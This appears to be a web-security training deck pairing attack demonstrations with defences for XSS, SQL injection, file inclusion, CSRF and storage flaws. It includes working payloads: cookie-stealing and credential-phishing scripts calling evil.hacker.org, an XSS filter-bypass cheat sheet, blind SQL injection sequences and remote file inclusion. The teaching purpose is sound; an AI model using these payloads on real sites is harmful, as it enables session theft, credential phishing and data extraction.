Web安全解决方案V1.0 (Web Security Solutions V1.0)

Audience: penetration testers, software developers, security analysts, security consultants, or whoever else.
Topics: cross-site scripting (XSS), injection, remote/malicious file execution, CSRF, broken access control, misconfiguration, insecure data storage, insecure direct object reference, broken authentication and session management, insecure communications.
Intrusion techniques and defenses: XSS
 
How stored XSS plays out between the attacker, the vulnerable site and its other users:
1. The attacker posts malicious code to the server (Post Forum Message, subject: "Free Olympic tickets!!!", body: <script> attack code </script>).
2. The database stores the post alongside the ordinary threads (姚明…, 刘翔…, 郑智…, 郭晶晶…, 中国队…).
3. Other users visit the forum and click the topic (Get /forum.php?fid=122&mid=241).
4. The server sends the stored post back to them.
5. Their browsers execute the attack code.
The same delivery path carries different payloads: stealing cookies, phishing usernames and passwords, redirecting to a spoofed server, or enrolling the browser in a botnet.
Reflected XSS in its simplest form:
<?php print 'welcome '.$_GET['name']; ?>
http://example/welcome.php?name=Wong_Bin renders
<HTML> <Body> Welcome Wong_Bin </Body> </HTML>
http://example/welcome.php?name=<script>alert("XSS")</script> renders
<HTML> <Body> Welcome <script>alert("XSS")</script> </Body> </HTML>
and the script runs in the visitor's browser with the site's origin.
Stored XSS through a profile field. The update page:
<font size=5>Update your email address</font>
<form name="inject" method="get" action="http://example/update.php">
<input type="text" name="email" size=60>
<input type="submit" value="OK">
</form>
<?php
// update.php: writes the submitted address straight into the database (also injectable, see the SQL injection section)
$email = $_GET['email'];
$query = "update user set email='$email' where name='wong'";
$db_query = mysql_db_query($dbname, $query);
if (mysql_affected_rows()) { print "Success update..."; }
?>
<?php
// profile page: prints the stored value without encoding it
$query = "select email from user where name='wong'";
$db_query = mysql_db_query($dbname, $query);
$db_result = mysql_result($db_query, 0);
if ($db_result) { echo "<p>EMAIL Address: $db_result<p>"; }
?>
Normal use shows: EMAIL Address: huangbin@nsfocus.com
If the attacker instead submits
huangbin@nsfocus.com<script>document.location='http://evil.hacker.org/steal_cookies.php?cookies='+encodeURI(document.cookie);</script>
every visitor to the profile page sends their cookies to http://evil.hacker.org. Steal cookies!!!
Phishing through the same forum post. The stored payload loads an external script without a <script> tag:
<body background=javascript:evil=document.createElement("script");evil.src="http://evil.hack.org/xss.js";document.body.appendChild(evil);>
xss.js rewrites the page into a fake login prompt ("Please log in again. User: Password: OK Cancel"):
<script language=JavaScript>
function Phishing() {
  evil_code = ... /* markup of the fake login page */;
  document.write(evil_code);
}
Phishing()
</script>
The fake form leaks whatever is typed the moment it is submitted:
<form action="user_information.php" method="post" onsubmit="evilImg=new Image; evilImg.src='http://evil.hacker.org/'+document.forms[1].login.value+':'+document.forms[1].password.value;">
and the attacker's user_information.php appends each pair to a file:
<?php
if (isset($_POST['username']) && isset($_POST['password'])) {
    $filename = "/www/user_information.txt";
    $file = @fopen($filename, "a");
    $info = "user: ".$_POST['username']." passwd: ".$_POST['password']."\n";
    @fwrite($file, $info);
    @fclose($file);
}
?>
Visitors see "Welcome to the Olympic forum! Username: Password:", log in again, and their credentials land in user_information.txt.
Why blacklist filters fail, one step at a time (Normally / Evil / Danger / Weak as labelled on the slides):

Normally: <INPUT TYPE="image" SRC="http://example">
Evil: <INPUT TYPE="image" SRC="http://example"><script>alert('xss')</script>
Danger. Filter: replace(str, "<", "&lt;"), replace(str, ">", "&gt;"), or strip '<script.*>'. Weak, because:

Evil: <INPUT TYPE="image" SRC=javascript:alert("xss")> needs no tag of its own. Filter (VBScript):
Dim re
Set re = new RegExp
re.IgnoreCase = True
re.Global = True
re.Pattern = "javascript:"
Str = re.replace(Str, "javascript : ")
re.Pattern = "jscript:"
Str = re.replace(Str, "jscript : ")
re.Pattern = "vbscript:"
Str = re.replace(Str, "vbscript : ")
Set re = nothing
Not so good, because:

Evil: <INPUT TYPE="image" SRC=javascript&#58alert("xss")> writes the colon as a character reference; the browser decodes it, the pattern never matches. Filter: replace(str, "&", "&amp;"). Weak, because:

Evil: <img src="javas	cript:alert('xss')"> puts a tab (or newline) inside the scheme name; browsers ignore it, the pattern does not. Filter: replace(str, " ", "&nbsp;"). Weak, because:

Evil-looking: the whole payload URL-encoded,
http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C
reaches the filter already decoded by the server as
http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>
Wrong.

A typical home-grown encoder (Danger input / Encoding input):
function safe_html($msg) {
    $msg = str_replace('&amp;', '&', $msg);
    $msg = str_replace('&nbsp;', ' ', $msg);
    $msg = str_replace('&quot;', '"', $msg);
    $msg = str_replace("'", "'", $msg);        // as on the slide; this line is garbled there
    $msg = str_replace("<", "&lt;", $msg);
    $msg = str_replace(">", "&gt;", $msg);
    $msg = str_replace("\t", " &nbsp; &nbsp;", $msg);
    $msg = str_replace("\r", "", $msg);
    $msg = str_replace("\n", " &nbsp; ", $msg);
    return $msg;
}
It decodes entities first (undoing any earlier encoding) and then encodes only < and >, leaving & and both kinds of quote alone, so input that lands inside an attribute value can still break out of it.

Evil, and untouched by every filter above because none of them contains "javascript:" or a <script> tag:
<img src="#" onerror=alert(/xss/)>
<img src="#" style="evil:expression(alert(/xss/));">
<img src="#"/**/onerror=alert(/xss/)>
Data path: HTML form → web application → database → web application → browser. Where a defence can sit:
- Before (on input): replace(str, danger, safer) ...
- During (on output): htmlspecialchars($html, ENT_QUOTES) ...
- After (in the browser): Firefox NoScript ...
Danger at both ends: input filtering alone is bypassable, and browser add-ons protect only the users who install them; encoding on output is the step that must not be missing.
Danger: everything in the request is attacker-controlled, not just the form fields. Headers (Referer, User-Agent), the query string (var1=page1.html) and parameters that look like static choices (pagestyle=default.css) are all input:
POST /thepage.jsp?var1=page1.html HTTP/1.1
Accept: */*
Referer: http://www.myweb.com/index.html
Accept-Language: en-us,de;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.myweb.com
Connection: Keep-Alive

uid=fred&password=secret&pagestyle=default.css&action=login
Vectors a '<script.*>' filter never sees:
<table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
<input type='image' src=javascript:evil()> <img src='javascript:evil()'> <frameset><frame src="javascript:danger()">...
<link rel="stylesheet" href=javascript:evil()> <base href=javascript:evil()>
<meta http-equiv="refresh" content="0;url=javascript:danger()"> <p style='background-image: url("javascript:danger();")'> <a href='javascript:danger();'>
<body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'> <div onmouseenter='danger();'>
<object type="text/x-scriptlet" data="evil.com/danger.js"> <style>@import evil.com/danger.js</style> <div style="width:expression(danger();)">

Browser-specific and encoding tricks (the cheat-sheet slide):
[IE] <div style="behaviour: url( [link to code] );">
[Mozilla] <div style="binding: url( [link to code] );">
[IE] <div style="width: expression( [code] );">
[N4] <style type="text/javascript">[code]</style>
[IE] <object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div>
[UTF-8; IE, Opera] [xC0][xBC]script>[code][xC0][xBC]/script>
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
[IE] <img dynsrc="javascript:[code]">
[IE] <input type="image" dynsrc="javascript:[code]">
[IE] <bgsound src="javascript:[code]">
&<script>[code]</script>
[N4] &{[code]};
[N4] <img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
[IE] <iframe src="vbscript:[code]">
[N4] <img src="mocha:[code]">
[N4] <img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
Built-in tools: htmlspecialchars(), htmlentities(), strip_tags().
$str = strip_tags($_POST['message'], '<b><p><i><u>');
$str = htmlentities($str);
echo nl2br($str);
(Encoding after strip_tags makes the allow-list pointless: the permitted <b> and <p> are encoded along with everything else. Either keep the tags and encode attributes, or encode everything and skip strip_tags.)

strip_tags() removes tags, not their contents:
<?php
$html = '<p><i><s>Welcome to Nsfocus!</i></p></s>';
print strip_tags($html);               // Welcome to Nsfocus!
print "\n";
// Allow <p><i><s>
print strip_tags($html, '<p><i><s>');  // <p><i><s>Welcome to Nsfocus!</i></p></s>
?>
<?php
$html = '<script>alert("xss attack!!")</script>';
print strip_tags($html);               // alert("xss attack!!")   (the tag goes, the script text stays)
print "\n";
// Allow <script>
print strip_tags($html, '<script>');   // the payload survives untouched
?>

htmlspecialchars() and htmlentities() turn markup into text:
<?php
$html = "<a href='http://example'>evil link</a>";
$new_html = htmlspecialchars($html, ENT_QUOTES);
// &lt;a href=&#039;http://example&#039;&gt;evil link&lt;/a&gt;
print $html."\n";      // rendered as a clickable "evil link"
print $new_html;       // rendered as the literal text <a href='http://example'>evil link</a>
?>
<?php
$html = '<script>alert("xss attack!!")</script>';
$new_html = htmlentities($html, ENT_QUOTES, 'UTF-8');
// &lt;script&gt;alert(&quot;xss attack!!&quot;)&lt;/script&gt;
print $new_html."\n";  // shown as text
print $html;           // executed
?>
Always pass ENT_QUOTES (so both ' and " are encoded) and the character set, otherwise values placed inside single-quoted attributes can still break out.
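The filter-bypass sequence and the strip_tags/htmlspecialchars demos above, put side by side in one runnable script. This is an added example, not code from the NSFOCUS slides: it combines the slides' own blacklist filters into one function, runs the slides' payloads through it, and contrasts that with context-aware output encoding. The helper names (blacklist_filter, encode_html, safe_url, allowlist_keeps_handlers) are mine; it assumes PHP 7.1 or later.

```php
<?php
// Added example (not from the slides): the blacklist filters shown above
// against the slides' own bypass payloads, beside the encoding that
// actually neutralises them. Assumes PHP >= 7.1.

// The "Weak" / "Not so good" filters from the slides, combined into one.
function blacklist_filter(string $s): string
{
    $s = preg_replace('/<script.*?>/i', '', $s);
    return str_ireplace(['javascript:', 'jscript:', 'vbscript:'],
                        ['javascript : ', 'jscript : ', 'vbscript : '], $s);
}

// Text nodes and quoted attribute values: encode, never filter.
function encode_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// href/src values: decode what the browser would decode, then allow-list
// the scheme. Character references need not end in ';' and browsers drop
// control characters inside the scheme, so handle both before checking.
function safe_url(string $url): string
{
    $decoded = preg_replace_callback('/&#(x[0-9a-f]+|[0-9]+);?/i', function ($m) {
        $cp = stripos($m[1], 'x') === 0 ? hexdec(substr($m[1], 1)) : (int) $m[1];
        return html_entity_decode('&#' . $cp . ';', ENT_QUOTES, 'UTF-8');
    }, $url);
    $scheme = strtolower(preg_replace('/[\x00-\x20]+/', '', (string) strtok($decoded, ':')));
    return in_array($scheme, ['http', 'https'], true) ? encode_html($decoded) : '#';
}

// strip_tags() with an allow-list keeps every attribute on the allowed
// tags, so an event handler on <b> survives; the caller must still
// encode or strip attributes itself.
function allowlist_keeps_handlers(string $s): bool
{
    $kept = strip_tags($s, '<b><p><i><u>');
    return (bool) preg_match('/\son[a-z]+\s*=/i', $kept);
}

// Payloads taken from the slides (constructed input for the demo).
function demo(): array
{
    $payloads = [
        'javascript&#58alert("xss")',           // colon as character reference
        "javas\tcript:alert('xss')",             // tab inside the scheme
        '<img src="#" onerror=alert(/xss/)>',    // no <script>, no javascript:
        '<b onmouseover=alert(1)>bold</b>',      // allowed tag, hostile attribute
        'http://example/',                       // the one value safe_url lets through
    ];
    $out = [];
    foreach ($payloads as $p) {
        $out[] = [
            'payload'         => $p,
            'after_blacklist' => blacklist_filter($p),       // unchanged for every payload
            'as_text'         => encode_html($p),            // inert inside an HTML body
            'as_href'         => safe_url($p),               // '#' unless the scheme is http(s)
            'survives_strip'  => allowlist_keeps_handlers($p), // true only for the <b onmouseover>
        ];
    }
    return $out;
}

foreach (demo() as $row) {
    echo json_encode($row, JSON_UNESCAPED_SLASHES), PHP_EOL;
}
```

Run it with `php` on the command line. Every payload comes out of blacklist_filter unchanged, which is the whole point of the slides' progression; the same payloads are harmless after encode_html, and safe_url rejects all of them except the plain http URL because it decides on the decoded, whitespace-stripped scheme rather than on a substring.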
Untrusted input arrives through more than $_GET: $_FILES['message'], $_GET['message'], $_REQUEST['message'], $_POST['message'], $HTTP_GET_VARS['message'], $_COOKIE['message'], $_ENV['message'], $_SESSION['message'], $_SERVER['message'], and more. Every one of them is encoded on output the same way.
 
Intrusion techniques and defenses: SQL injection
 
The login form:
<form action="login.php" method="get" name="login">
User: <input type="text" name="username" value="" maxlength="20">
Password: <input type="password" name="password" value="" maxlength="20">
<input type=submit name="confirm" value="OK">
<input type=reset name="cancel" value="Cancel">
</form>
login.php builds the query by string concatenation (the maxlength on the form is no protection; the request is sent directly):
<?php
$query = "select * from user where username='$_GET[username]' and password='$_GET[password]'";
$db_query = mysql_db_query($dbname, $query);
$db_result = mysql_fetch_array($db_query);
if ($db_result) { print "Success in..."; }
?>
Username admin with password ' or ''=' turns
select * from user where username='$_GET[username]' and password='$_GET[password]'
into
select * from user where username='admin' and password='' or ''=''
which is always true: Success in...
Worse: username '; Delete from users;/* gives
select * from user where username='';Delete from users;/*...
(stacked queries; the old mysql_* functions refuse a second statement in one call, but drivers that allow multiple statements will run it).
Search page:
<font size=5>Search page</font>
<form name="inject" method="get" action="http://example/Search.php">
<input type="text" name="search_name" size=60>
<input type="submit" value="OK">
</form>
<?php
$search_name = $_GET['search_name'];
$query = "select * from user where username like '%$search_name%' order by id desc";
$db_query = mysql_db_query($dbname, $query);
$db_result = mysql_num_rows($db_query);
if ($db_result) { print "Search result..."; }
?>
Searching for %' order by id# turns
select * from user where username like '%$search_name%' order by id desc
into
select * from user where username like '%%' order by id#%' order by id desc
(# comments out the rest) and every username is listed.
Password change:
<font size=5>Update your password</font>
<form name="update" method="get" action="http://example/update.php">
<input type="text" name="password" size=20>
<input type="submit" value="OK">
</form>
<?php
$passwd = $_GET['password'];
$query = "update user set passwd='$passwd' where uid='$uid'";
$db_query = mysql_db_query($dbname, $query);
if (mysql_affected_rows()) { print "Success in update..."; }
?>
A new password of 123' where uid='1'/* turns
update user set passwd='$passwd' where uid='$uid'
into
update user set passwd='123' where uid='1'/*' where uid='252'
and user 1's password is changed instead of the attacker's own (uid 252).
Error messages leak data. Get /query.php?name=Wong' and Get /query.php?name=Wong' and LEFT(password,1)='i both return FALSE, but the error text the server prints reads: "MYSQL SERVER: syntax error converting the varchar value 'luyq@#11'. /show/query.php, line 87". The password is luyq@#11.
Debug switches left in production do the same: Post /attacktarget?errors=Y&debug=5 → "Show more..."; Get /query.php?user=joe' → the full error message whenever $debug = 1 ...
Take care with functions that reveal source or errors: show_source(), highlight_string(), highlight_file(), and anything else that prints error details. Better: control error_reporting() in code and set display_errors = off in php.ini, logging errors instead.
Blind injection against MS SQL Server, step by step:
1. Find the injection point:
Get /query.asp?name=Wong'           → FALSE (error)
Get /query.asp?name=Wong and 1=1    → TRUE
Get /query.asp?name=Wong and 1=2    → FALSE
2. Probe the schema:
Get /query.asp?name=Wong and (select count(*) from admin)>=0         → TRUE  (table admin exists)
Get /query.asp?name=Wong and (select count(user) from admin)>=0      → FALSE
Get /query.asp?name=Wong and (select count(username) from admin)>=0  → TRUE  (column username exists)
...
3. Probe the lengths:
Get /query.asp?name=Wong and (select top 1 len(username) from admin)>5   → TRUE
Get /query.asp?name=Wong and (select top 1 len(username) from admin)<10  → TRUE
Get /query.asp?name=Wong and (select top 1 len(username) from admin)=8   → TRUE
... username is 5 characters, password 8
4. Probe the values one character at a time:
Get /query.asp?name=Wong and 1=(select count(*) from admin where id=1 and mid(username,1,1)='a')  → TRUE
Get /query.asp?name=Wong and 1=(select count(*) from admin where id=1 and mid(username,2,1)='r')  → FALSE
... username: admin, password: jjyy@!&1
Blind injection against MySQL:
1. Find the injection point:
Get /query.php?name=joe'            → FALSE
Get /query.php?name=joe' and 1=1    → TRUE
Get /query.php?name=joe' and 1=2    → FALSE
2. Probe the password length (the unterminated string reuses the original query's closing quote):
Get /query.php?name=joe' and LENGTH(password)>'5   → TRUE
Get /query.php?name=joe' and LENGTH(password)<'15  → TRUE
Get /query.php?name=joe' and LENGTH(password)='13  → TRUE → 13 characters
3. Probe the password:
Get /query.php?name=joe' and LEFT(password,1)='m  → FALSE
Get /query.php?name=joe' and LEFT(password,1)='i  → TRUE
Get /query.php?name=joe' and LEFT(password,2)='f  → FALSE
... password: ilovepassword
4. Find other tables with UNION (the column count must match the original query):
Get /query.php?name=joe' union select 1,1,1,1,1 from root_user/*    → FALSE
Get /query.php?name=admin' union select 1,1,1,1,1 from admin_user/* → TRUE → admin_user holds the administrator accounts
5. Read them out:
Get /query.php?name=joe' and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user/*  → username admin, password fly_you!@#
6. With the FILE privilege, read files from the database host:
Get /query.php?name=-1' union select 1,1,1,1,load_file('c:/boot.ini')  → contents of C:\boot.ini
Server-side validation flow: check data length, then data type, then allowed characters; input that fails any check gets an error message instead of being processed.
Client-side checks and filters are a convenience only: the attacker bypasses them and submits directly, so the server must repeat the checks itself, reject invalid input with an error, process only what passes, and log the attempt.
Characters that need attention (SQL, shell and HTML contexts): < > & ' " + ; whitespace % / # . Danger!
Tools and settings: addslashes, mysql_real_escape_string, PDO (prepared statements), escapeshellarg, escapeshellcmd, magic_quotes_gpc, register_globals, safe_mode, allow_url_fopen, open_basedir, disable_functions. (Speaker's note: the solutions side is thin here and needs more time.)
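Of the tools just listed, prepared statements are the one that removes the problem rather than escaping around it. The script below is an added example, not code from the slides: it rebuilds the login and password-change queries from this section against an in-memory SQLite database (so it runs offline; the pdo_sqlite extension is assumed, and PDO_MYSQL behaves the same) and runs the slides' payloads against the concatenated and the bound versions. Table contents are constructed sample rows; the function names are mine.

```php
<?php
// Added example (not from the slides): the section's login and update
// queries, string-concatenated versus prepared, against SQLite in memory.
// Assumes PHP >= 7.1 with pdo_sqlite.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE user (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    // Constructed sample rows; plaintext passwords only to mirror the slides.
    $db->exec("INSERT INTO user (uid, username, password) VALUES (1, 'admin', 'jjyy@!&1')");
    $db->exec("INSERT INTO user (uid, username, password) VALUES (252, 'joe', 'ilovepassword')");
    return $db;
}

// Wrong: the slides' query, built by concatenation.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "select * from user where username='$user' and password='$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Right: placeholders; the value never becomes part of the SQL text.
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare('select * from user where username = :u and password = :p');
    $st->execute([':u' => $user, ':p' => $pass]);
    return $st->fetch() !== false;
}

// The password-change query: the uid comes from the session, never from
// the request, and is bound like everything else.
function change_password(PDO $db, int $sessionUid, string $newPass): int
{
    $st = $db->prepare('update user set password = :p where uid = :uid');
    $st->execute([':p' => $newPass, ':uid' => $sessionUid]);
    return $st->rowCount();
}

function demo(): array
{
    $db = make_db();
    $bypass = "' or ''='";                                           // the slides' payload
    return [
        'concat_bypass'   => login_concat($db, 'admin', $bypass),      // true: logged in as admin
        'prepared_bypass' => login_prepared($db, 'admin', $bypass),    // false
        'prepared_real'   => login_prepared($db, 'admin', 'jjyy@!&1'), // true
        // The slides' "123' where uid='1'/*" is stored as a literal password for uid 252.
        'rows_changed'    => change_password($db, 252, "123' where uid='1'/*"),  // 1
        'admin_intact'    => login_prepared($db, 'admin', 'jjyy@!&1'), // still true
    ];
}

print_r(demo());
```

The point to take from rows_changed and admin_intact together: with a bound parameter the quote and the comment marker in the attacker's "password" are data, so only the row the session owns is touched. addslashes and mysql_real_escape_string try to reach the same state by rewriting the value; prepared statements never put the value inside the statement to begin with.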
Intrusion techniques and defenses: malicious file execution
 
Remote file inclusion:
<?php include($_GET['file'].".php"); ?>
Get /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt makes the server fetch http://evil.hacker.org/evilscript.txt.php and execute it; the appended ".php" does not help, because the attacker's server answers to any name. What the attacker serves:
<?php print file_get_contents('/etc/passwd'); ?>
  → root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ... (the web server's own /etc/passwd comes back in the response)
<?php var_dump(get_defined_vars()); die(); ?>
  → dumps every variable in scope, database credentials included
<?php
print "Guess user & password demo";
include('http://evil.hacker.org/userGuesses.php');
foreach ($userGuesses as $user => $password) {
    $connection = @mysql_connect('localhost', $user, $password);
    if ($connection) {
        print "Success with username: $user. Using password: $password";
    }
}
?>
  → brute-forces the local MySQL account from inside the web server, where 'localhost' is trusted
Wrong:
<?php include($_GET['file'].".php"); ?>
Right: turn off allow_url_fopen and allow_url_include. Advise: include only names from an allow-list, never the parameter itself:
<?php
$page = array(
    'contact' => 'contact.php',
    'help'    => 'help.php',
    'query'   => 'query.php');
if (array_key_exists($_GET['file'], $page)) {
    include('/full/path/'.$page[$_GET['file']]);
}
?>
Path traversal in a file-deletion script: Get /del.php?user=../etc&file=passwd → "Del /etc/passwd success".
<?php
// delete the named file from the user's home directory
$username = $_GET['user'];
$homedir = "/home/$username";
$file_to_delete = "$userfi...
The two parameters are concatenated into a path, so ../ in user walks out of /home.
Right / Better:
<?php
$username = $_SERVER['REMOTE_USER']; // take the identity from the authenticated request, not from a parameter
...
And: give the web user that PHP runs as very limited privileges!
Mail header injection:
<?php
$to = 'nobody@example.com';
$subject = 'the subject';
$message = 'hello';
$from = $_POST['from'];
mail($to, $subject, ...
A from value that contains a line break followed by further headers (Bcc:, extra recipients, a new Subject:) turns the contact form into a spam relay. Check the value before it reaches a header:
<?php
$to = 'nobody@example.com';
$subject = 'the subject';
$message = 'hello';
$from = $_POST['from'];
if (! ctype_print(...
(ctype_print rejects every control character, CR and LF included.)
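What the injected value looks like and what the ctype_print check from the slide catches, as an added example rather than the slides' code. It adds an address-format check on top, builds the header string the slide passes to mail(), and never actually sends anything. The attacker input is constructed; the function names are mine; PHP 7.1 or later is assumed.

```php
<?php
// Added example (not from the slides): rejecting header injection in the
// From: value of the mail() form above. Nothing is sent. Assumes PHP >= 7.1.

// A header value must be one line of printable characters and, for From:,
// a syntactically valid address.
function safe_from_header(string $from): ?string
{
    if (!ctype_print($from)) {                       // the slide's check: no CR, LF, NUL, ...
        return null;
    }
    if (filter_var($from, FILTER_VALIDATE_EMAIL) === false) {
        return null;                                 // also rejects "a@b.com, c@d.com"
    }
    return 'From: ' . $from;
}

// Builds the additional-headers argument for mail(), or refuses.
function build_headers(string $from): ?string
{
    $h = safe_from_header($from);
    return $h === null ? null : $h . "\r\n";
}

function demo(): array
{
    // Constructed attacker input: a valid-looking address followed by
    // injected headers that would make the form mail arbitrary recipients.
    $attack = "sender@example.com\r\nBcc: victim1@example.net, victim2@example.net\r\nSubject: buy now";
    return [
        'attack_rejected'   => build_headers($attack) === null,                       // true
        'two_addresses'     => build_headers('a@example.com, b@example.com') === null, // true
        'benign_accepted'   => build_headers('nobody@example.com'),                   // "From: nobody@example.com\r\n"
    ];
}

print_r(demo());
```

FILTER_VALIDATE_EMAIL accepts a bare address only, so a display-name form such as "Joe <joe@example.com>" is refused too; if the form needs display names, validate the address part separately and keep the ctype_print check on the whole value.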
Intrusion techniques and defenses: CSRF
 
The delivery path is the one already drawn for stored XSS (the attacker posts, the database stores it, other users visit the site and click the topic, their browsers run what comes back), but the payload now issues requests in the victim's name rather than only running script.
The MySpace worm: Attacker → Myspace, Post <div style="background:url()">. Cool! The site's filters removed <script.*>, onclick, <a h... and let the CSS url() through, and every profile that viewed the post re-posted it.
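The standard defence for the forum-post case is a secret the attacker's page cannot read. The script below is an added example, not code from the slides: a per-session anti-CSRF token emitted as a hidden field and verified on every state-changing POST. The session is a plain array so the functions run without a web server; the names (csrf_token, csrf_field, csrf_valid, handle_post) are mine; PHP 7.0 or later is assumed for random_bytes and hash_equals.

```php
<?php
// Added example (not from the slides): per-session anti-CSRF token for a
// state-changing form such as the forum post in the diagram above.
// Assumes PHP >= 7.0. The session is a plain array here.

const TOKEN_KEY = 'csrf_token';

// One token per session, created on first use and reused until logout.
function csrf_token(array &$session): string
{
    if (empty($session[TOKEN_KEY])) {
        $session[TOKEN_KEY] = bin2hex(random_bytes(32));
    }
    return $session[TOKEN_KEY];
}

// Emit the token as a hidden field; encode it like any other output.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="' . TOKEN_KEY . '" value="'
         . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison; a missing or foreign token fails closed.
function csrf_valid(array $session, array $post): bool
{
    if (empty($session[TOKEN_KEY]) || !isset($post[TOKEN_KEY]) || !is_string($post[TOKEN_KEY])) {
        return false;
    }
    return hash_equals($session[TOKEN_KEY], $post[TOKEN_KEY]);
}

// The forum handler: only POSTs carrying this session's token are acted on.
function handle_post(array &$session, string $method, array $post): string
{
    if ($method !== 'POST' || !csrf_valid($session, $post)) {
        return 'rejected';
    }
    return 'posted: ' . ($post['subject'] ?? '');
}

function demo(): array
{
    $victim = [];                                   // the victim's session store
    $field  = csrf_field($victim);                  // rendered into the victim's own form
    $token  = $victim[TOKEN_KEY];

    // A cross-site request built by the attacker's page can set every
    // field except the one it cannot read: the victim's token.
    $forged = ['subject' => 'Free Olympic tickets!!!', TOKEN_KEY => str_repeat('0', 64)];
    $legit  = ['subject' => 'Hello', TOKEN_KEY => $token];

    return [
        'forged'          => handle_post($victim, 'POST', $forged),            // rejected
        'no_token'        => handle_post($victim, 'POST', ['subject' => 'x']), // rejected
        'get_request'     => handle_post($victim, 'GET', $legit),              // rejected
        'legit'           => handle_post($victim, 'POST', $legit),             // posted: Hello
        'field_has_token' => strpos($field, $token) !== false,                 // true
    ];
}

print_r(demo());
```

The token stops a form or image request launched from another site. It does not stop script that is already running inside the site's own origin, which can read the hidden field and submit it; that is the MySpace situation, and it is why the XSS defences earlier in the deck come first.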
Intrusion techniques and defenses: misconfiguration
Backup files left in the web root: Get /config/horde.php.bak returns the configuration as plain text,
... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $c...
with the database credentials in it.
Wrong: editor backups and .bak/.old copies inside the document root, served as text because the extension is not .php.
Right: keep them out of the web root, and harden php.ini:
register_globals = Off
allow_url_fopen = Off
magic_quotes_gpc = Off
magic_quotes_runtime = Off
safe_mode = On
open_base...
Intrusion techniques and defenses: authentication flaws
Authentication bypass with register_globals: the attacker posts a wrong username or password (Get /login.php: "invalid username or password"), then requests Get /script.php?authorized=1 and gets "Success...":
<?php
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {   // with register_globals on, ?authorized=1 sets this from the query string
    include '/highly/sensitive/data.php';
}
...
Better / Advise: initialise the flag before the check and keep it in the session, not in a global:
<?php
$_SESSION['authenticated'] = false;
if (...
Predictable session identifiers are the same flaw from the other side; a counter is not an identifier:
<?php
if (!isset($_SESSION['session_id'])) {
    $_SESSION['session_id'] = 1;
} else {
    $_SESSION['session_id']++;
}
print "we...
Intrusion techniques and defenses: storage flaws
Once an attacker can read the admin table, whether by blind injection,
Get /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,1,1)='a') ...
Get /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(username,1,1)='1') ...
or by simply downloading it, Get /config/database.mdb, what is stored decides the damage:
Wrong: Username | password: Admin | admin@#$%! (plaintext; the attacker logs in immediately)
Right: Username | password: Admin | 120a1b2649c88aef29edd2ffd7359d73 (a hash; the attacker still has to crack it)
Storing the hash:
<?php
// store the password hash
$query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", addslashes($username), md5(...
Cookie: md5(uniqid(rand(), true)) is better than md5(uniqid(rand())) for tokens that must not be guessable.
Session: set session.save_path in php.ini so that session files do not sit in a shared, world-readable directory.
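The storage slides still use an unsalted md5 for passwords and a uniqid()/rand() construction for tokens. As an added example, not the slides' code, the script below puts those beside what a current PHP offers: password_hash() with bcrypt (random per-user salt, tunable cost) and random_bytes() for session or cookie tokens, which also answers the counter-based session id in the authentication section. The example password is the one from the slide; function names are mine; PHP 7.0 or later is assumed.

```php
<?php
// Added example (not from the slides): the storage slide's md5(password)
// next to a salted, slow hash, and md5(uniqid(rand(), true)) next to a
// CSPRNG token. Assumes PHP >= 7.0.

// What the slide stores: fast, unsalted, identical for identical passwords.
function legacy_hash(string $password): string
{
    return md5($password);
}

// bcrypt via password_hash(): the random per-user salt and the cost are
// embedded in the returned string, so two users with the same password
// get different hashes and each one must be attacked separately, slowly.
function store_hash(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

function check_password(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Session or "remember me" token: 256 bits from the OS CSPRNG. uniqid() is
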